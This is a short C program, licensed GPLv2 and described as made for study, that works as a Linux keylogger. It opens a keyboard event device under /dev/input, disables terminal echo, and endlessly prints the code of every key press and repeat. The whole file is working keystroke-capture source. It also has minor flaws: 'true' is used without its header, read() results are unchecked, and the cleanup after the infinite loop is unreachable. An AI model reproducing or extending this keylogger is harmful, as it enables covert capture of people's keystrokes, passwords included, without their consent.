/*
*
    * LICENSE: GPLv2
        *** Created only for study purposes.
*
*/

#include <errno.h>
#include <fcntl.h>
#include <linux/input.h>
#include <stdio.h>
#include <stdlib.h>
#include <termios.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    if (argc != 2)
    {
        fprintf(stderr, "Usage: %s kbdeventfile\n", argv[0]);
        fprintf(stderr, "\tKeyboard event files can be found at /dev/input/by-path\n");
        return EXIT_FAILURE;
    }
    int fd = open(argv[1], O_RDONLY, 0);
    if (fd == -1) {
        perror("open()");
        return EXIT_FAILURE;
    }

    printf("Keylogger active... \n");
    struct termios tio;

    tcgetattr(STDIN_FILENO, &tio);
    struct termios noecho = tio;

    // Disable echo.
    noecho.c_lflag ^= ECHO;
    tcsetattr(STDIN_FILENO, TCSANOW, &noecho);

    struct input_event in_e;
    // Continuously read the event file generated by the kernel.
    while (true) {
        read(fd, &(in_e), sizeof(in_e));
        // Accept events triggered due to a fresh key press or duplication.
        if (in_e.value == 1 || in_e.value == 2) {
            // Accept only events that are trigged due to a key press.
                // Key events have codes of type (KEY_X|BTN_X).
            if (in_e.type == EV_KEY)
                printf("Read: %d\n", in_e.code);
        }
    }
    close(fd);
    // Restore terminal attributes.
    tcsetattr(STDIN_FILENO, TCSANOW, &tio);
    printf("Bye..!\n");
    return EXIT_SUCCESS;
}
